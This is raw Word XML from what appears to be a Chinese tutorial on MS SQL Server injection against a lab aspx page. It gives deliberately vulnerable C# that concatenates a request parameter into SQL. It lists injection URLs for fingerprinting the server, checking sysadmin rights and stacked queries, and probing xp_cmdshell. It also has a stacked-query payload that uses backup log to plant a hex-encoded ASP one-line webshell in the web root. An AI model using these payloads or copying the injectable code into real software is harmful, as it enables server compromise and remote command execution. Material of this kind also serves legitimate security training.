      <w:r w:rsidR="00586F6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取数据库用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63245758" w14:textId="77777777" w:rsidR="00C16530" w:rsidRDefault="00586F6A" w:rsidP="00C16530">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直接输入如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0437A603" w14:textId="77777777" w:rsidR="00586F6A" w:rsidRPr="00764DAB" w:rsidRDefault="00586F6A" w:rsidP="00586F6A">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nd db_name() =O--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E868CD" w14:textId="77777777" w:rsidR="00586F6A" w:rsidRPr="00586F6A" w:rsidRDefault="00586F6A" w:rsidP="00C16530">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="200964A7" w14:textId="77777777" w:rsidR="006201CC" w:rsidRPr="00527CFD" w:rsidRDefault="00C16530" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="002C39DE" w:rsidRPr="00527CFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002C39DE" w:rsidRPr="00527CFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入一句话木马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23672EE4" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="002A109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找到Web目录后，就可以写入一句话木马了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E9A99" w14:textId="77777777" w:rsidR="00430B0A" w:rsidRPr="00764DAB" w:rsidRDefault="002A109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后依次执行如下语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFDBB25" w14:textId="77777777" w:rsidR="00C16530" w:rsidRDefault="00D269A4"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pict w14:anchorId="6AA45E2F">
          <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
            <v:stroke joinstyle="miter"/>
            <v:path gradientshapeok="t" o:connecttype="rect"/>
          </v:shapetype>
          <v:shape id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-7.65pt;margin-top:5.85pt;width:437.65pt;height:130.4pt;z-index:251664384">
            <v:textbox>
              <w:txbxContent>
                <w:p w14:paraId="15A54C24" w14:textId="77777777" w:rsidR="003756DA" w:rsidRPr="00C16530" w:rsidRDefault="003756DA" w:rsidP="00C16530">
                  <w:pPr>
                    <w:ind w:firstLine="420"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00C16530">
                    <w:t>http://192.168.0.102/sqlserver/1.aspx?xxser=1;alter database testdb set RECOVERY FULL;create table test_tmp(str image);backup log testdb to disk='c:\test1' with init;insert into test_tmp(str) values (0x3C2565786375746528726571756573742822636D64222929253E);backup log testdb to disk='C:\wwwtest\iis-xxser.com--wwwroot\yjh.asp';alter database testdb set RECOVERY simple</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="100152EF"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1DD76229"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6ADD6F5F"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4C067D5B"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3003F0FD"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2240E717" w14:textId="77777777" w:rsidR="00C16530" w:rsidRDefault="00C16530" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EEE1447" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="000C467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执行完毕后，就会在指定的Web目录下生成一个名为“yjh.asp”的后门文件，用一句话木马客户端连接即可得到WebShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8CC719" w14:textId="77777777" w:rsidR="002405E7" w:rsidRPr="00664072" w:rsidRDefault="003D5726"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2.5</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002405E7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MsSQL 注入攻击案例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BF0C14"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这里我就用暗影的aspx构造注射专用页面给大家讲解SA注入，首先我改一下暗影的aspx构造注射专用页面的代码，部分代码如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313F612A"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string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F5282"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string sql =  "select * from admin where id="+i ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D45A8"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System.Data.SqlClient.SqlCommand</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B5FE3F"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lastRenderedPageBreak/>
        <w:t>command=new System.Data.SqlClient.SqlCommand(sql, conn);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E783EA"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int x = command.ExecuteNonQuery();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BC775C" w14:textId="77777777" w:rsidR="003B721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Response.Write("最终执行SQL语句为:  &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;"+sql+"\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3BC59B" w14:textId="77777777" w:rsidR="00857EAD" w:rsidRPr="00764DAB" w:rsidRDefault="003B721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这样我每输入一条注入语句都会在WEB前端看到插入到数据查询的</w:t>
      </w:r>
      <w:r w:rsidR="00E74F4E" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最终</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SQL语句</w:t>
      </w:r>
      <w:r w:rsidR="0055701B" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,有关详细环境搭建大家参照视频课程,这里漏洞测试地址如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2918CC90" w14:textId="77777777" w:rsidR="0055701B" w:rsidRPr="00764DAB" w:rsidRDefault="0055701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p>
    <w:p w14:paraId="376C7087" w14:textId="77777777" w:rsidR="0055701B" w:rsidRDefault="0055701B" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EBE1999" wp14:editId="1DE8EB56">
            <wp:extent cx="5274310" cy="233362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14:paraId="5625B811" w14:textId="77777777" w:rsidR="00E74F4E" w:rsidRPr="00E74F4E" w:rsidRDefault="0055701B" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  图 17</w:t>
      </w:r>
      <w:r w:rsidR="00032B80">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 测试页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001359E4" w14:textId="77777777" w:rsidR="00E56153" w:rsidRDefault="00611C84" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.2.5.1</w:t>
      </w:r>
      <w:r w:rsidR="00E56153">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MsSQL </w:t>
      </w:r>
      <w:r w:rsidR="00E56153">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入点信息检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C4105" w14:textId="77777777" w:rsidR="00E64970" w:rsidRPr="00764DAB" w:rsidRDefault="00E6497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提交如下地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31071158" w14:textId="77777777" w:rsidR="00857EAD" w:rsidRPr="00764DAB" w:rsidRDefault="00E6497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8739B4">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nd exists (select * from%20sysobjects)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77312AC2" w14:textId="77777777" w:rsidR="00291477" w:rsidRDefault="00291477" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B98F32D" wp14:editId="05B5A9EB">
            <wp:extent cx="5274310" cy="3773170"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="21" name="图片 20" descr="注入点检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入点检测1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3773170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3442562E" w14:textId="77777777" w:rsidR="00291477" w:rsidRPr="00E64970" w:rsidRDefault="00291477" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF0E65E" w14:textId="77777777" w:rsidR="00291477" w:rsidRPr="00764DAB" w:rsidRDefault="0029147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信息，说明该注入点类型为MsSQL注入点(图18).</w:t>
      </w:r>
      <w:r w:rsidR="006826CD" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果返回错误那说明对象名不存在，上面(图18)就是对比,</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再提交如下链接.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C2A52E" w14:textId="77777777" w:rsidR="00FF2518" w:rsidRPr="00764DAB" w:rsidRDefault="00FF251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 and system_user=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51478118" w14:textId="77777777" w:rsidR="006826CD" w:rsidRPr="00764DAB" w:rsidRDefault="0029147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其中的system_user是查询当前数据库系统的用户名，返回值是字符型，因此在与数字int整型数据进行对比时，会因为类型不匹配而造成数据库报错。从返回的错误信息中，可得知当前系统用户名(图19)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F305614" w14:textId="77777777" w:rsidR="00477B2D" w:rsidRDefault="00477B2D" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25444210" wp14:editId="46A7214D">
            <wp:extent cx="5274310" cy="2367915"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="22" name="图片 21" descr="注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入2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2367915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C63075F" w14:textId="77777777" w:rsidR="006826CD" w:rsidRDefault="00477B2D" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                         图19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1E93A4" w14:textId="77777777" w:rsidR="00291477" w:rsidRPr="00764DAB" w:rsidRDefault="0029147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再爆一下当前用户名，在浏览器中提交以下链接(图</w:t>
      </w:r>
      <w:r w:rsidR="002E0FE7" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3612C309" w14:textId="77777777" w:rsidR="002E0FE7" w:rsidRDefault="00FF2518" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.1.55/sqlserver/1.aspx?xxser=1and user=0</w:t>
      </w:r>
      <w:r w:rsidR="002E0FE7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B55760" wp14:editId="0BE5AD88">
            <wp:extent cx="5274310" cy="2694305"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="27" name="图片 26" descr="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79"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2694305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D0FC8D" w14:textId="77777777" w:rsidR="00254181" w:rsidRDefault="00254181" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  图20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54755D40" w14:textId="77777777" w:rsidR="00291477" w:rsidRPr="00764DAB" w:rsidRDefault="0029147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返回的信息中可知，当前用户名为dbo。如果返回的是sa，那么可以直接判断出用户的权限，但是这里只有提交如下链接查询的权限(图2</w:t>
      </w:r>
      <w:r w:rsidR="00542A86" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35874AA6" w14:textId="77777777" w:rsidR="00254181" w:rsidRDefault="00FB1DA9" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.1.55/sqlserver/1.aspx?xxser=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'))</w:t>
      </w:r>
      <w:r w:rsidR="00254181">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="053F01F7" wp14:editId="5D3B261D">
            <wp:extent cx="5274310" cy="2620645"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="28" name="图片 27"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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2620645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22479973" w14:textId="77777777" w:rsidR="00254181" w:rsidRPr="003223F5" w:rsidRDefault="00254181" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                               图21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD68DC5" w14:textId="77777777" w:rsidR="00291477" w:rsidRPr="00764DAB" w:rsidRDefault="0029147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页面，因此可知此注入点为sa权限，可考虑采用扩展存储进行攻击。再来检测一下是否支持多行语句，提交如下链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550992DC" w14:textId="77777777" w:rsidR="00857EAD" w:rsidRPr="00291477" w:rsidRDefault="00FA1F36" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://192.168.1.55/sqlserver/1.aspx?xxser=1 %20;declare %20@d%20int</w:t>
      </w:r>
      <w:r w:rsidR="00254181">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41320804" wp14:editId="376A675B">
            <wp:extent cx="5274310" cy="3684270"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="29" name="图片 28" descr="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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3684270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B53E905" w14:textId="77777777" w:rsidR="00857EAD" w:rsidRPr="00B92738" w:rsidRDefault="00254181" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                             图22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F62A0" w14:textId="77777777" w:rsidR="00F772E0" w:rsidRPr="00611C84" w:rsidRDefault="00611C84" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.2.5.2</w:t>
      </w:r>
      <w:r w:rsidR="00F772E0" w:rsidRPr="00611C84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测扩展存储</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081746B5" w14:textId="77777777" w:rsidR="00F772E0" w:rsidRPr="00764DAB" w:rsidRDefault="00F772E0"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先来判断一下xp_cmdshell存储过程是否存在，在浏览器中提交如下链接(图23).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000322C" w14:textId="77777777" w:rsidR="00767BC8" w:rsidRPr="00764DAB" w:rsidRDefault="00767BC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 xml:space="preserve">http://192.168.1.55/sqlserver/1.aspx?xxser=1 and 1=(select count(*) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2291801A" w14:textId="77777777" w:rsidR="00F772E0" w:rsidRDefault="00767BC8" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>frommaster.dbo.sysobjects where name ='xp_cmdshell')</w:t>
      </w:r>
      <w:r w:rsidR="00F772E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="080BE91A" wp14:editId="4BFA3228">
            <wp:extent cx="5274310" cy="1883410"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="30" name="图片 29" descr="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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId82"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1883410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EC2F2D" w14:textId="77777777" w:rsidR="00F772E0" w:rsidRPr="00BA1CE8" w:rsidRDefault="00F772E0" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                             图23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DAAEC8" w14:textId="77777777" w:rsidR="00F772E0" w:rsidRPr="00764DAB" w:rsidRDefault="00F772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正常页面，说明扩展存储存在。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55701BE7" w14:textId="77777777" w:rsidR="00F772E0" w:rsidRPr="00611C84" w:rsidRDefault="00611C84" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
